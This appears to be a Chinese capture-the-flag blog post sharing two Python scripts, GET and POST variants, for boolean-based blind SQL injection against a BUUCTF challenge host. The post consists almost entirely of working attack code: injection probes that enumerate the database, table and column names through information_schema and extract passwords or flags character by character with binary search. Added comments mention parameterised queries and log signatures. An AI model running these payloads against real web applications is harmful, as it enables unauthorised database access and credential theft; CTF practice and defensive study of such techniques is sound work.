在网上看了各个师傅们的代码,结合写了一下,提高输出效率又尽可能的使代码简约
GET型
import requests
url = "http://4f4e08ab-13d3-4d32-ab94-94955a536286.node5.buuoj.cn:81/search.php?id=0^"
res = ""
par = "?id=0^"  # not referenced by the GET variant; kept as on the page
# Boolean-based blind extraction: every request leaks one bit (whether "NO"
# appears in the page), and a binary search over ASCII 33..129 pins one
# character in about seven requests. On the defending side a parameterised
# query for `id` removes the oracle entirely; in logs the signature is a
# burst of otherwise identical requests whose only differences are an
# incrementing substr offset and a halving comparison value.
# NOTE(review): the nesting below is reconstructed from a paste that lost its
# indentation; the end-of-data check is assumed to sit in the outer loop.
# Offsets start at 160, presumably because the first 159 characters were
# recovered in an earlier run.
for pos in range(160, 250):
    print("第{0}个字符".format(pos))
    lo, hi = 33, 130  # search window; chr(33) == "!" is the lower bound
    while lo < hi:
        guess = (lo + hi) >> 1
        # Probes used for the earlier enumeration stages on the page:
        #   current database:   "(ascii(substr((select(database())),{0},1))>{1})".format(pos, guess)
        #   table names:        "(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))>{})".format(pos, guess)
        #   columns of F1naI1y: "(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{},1))>{})".format(pos, guess)
        probe = "(ascii(substr((select(group_concat(password))from(F1naI1y)),{},1))>{})".format(pos, guess)
        page = requests.get(url + probe).text
        if "NO" in page:
            lo = guess + 1  # character is above the guess
        else:
            hi = guess  # character is at or below the guess
    # lo == hi on exit, which is the value the original keeps in `mid`.
    found = chr(lo)
    if found == "!":
        # Search never moved off the lower bound: treated as end of data.
        break
    res += found
    print(res)
print("结果:" + res)
POST型
其实大体上差不多,只是改几个地方就好了
import requests
import time
rest = ""  # recovered characters; pre-seed with any already-known prefix
url = ""  # target URL
payload = {"": ""}  # form fields; the parameter name goes in as the key
par = ''  # any prefix the specific challenge requires before the condition
# Same boolean oracle as the GET variant, but the condition travels in a POST
# form field and "Hello" in the response is the true-branch signal. The
# remediation is unchanged (bind the parameter instead of interpolating it);
# the ~7 requests per character, differing only in substr offset and the
# compared value, are the pattern to alert on.
# NOTE(review): indentation was lost in the paste; the nesting below follows
# the usual shape (progress print inside the loop, final print after it).
for pos in range(1, 100):
    print('正在获取第 %d 个字符' % pos)
    lo, hi = 33, 130  # chr(33) == "!" is the lower bound of the window
    while lo < hi:
        guess = (lo + hi) >> 1
        payload[""] = "{0}(ascii(substr((select(flag)from(flag)),{1},1))>{2})".format(par, pos, guess)
        page = requests.post(url, data=payload).text  # data must be a dict
        if "Hello" in page:
            lo = guess + 1
        else:
            hi = guess
        time.sleep(0.001)  # short pause; the page says it only avoids occasional errors
    found = chr(lo)  # lo == hi here, the value the original holds in `middle`
    if found == "!":
        break  # search never moved: no more data
    rest += found
    print("结果:" + rest)
print(rest)
感谢各位师傅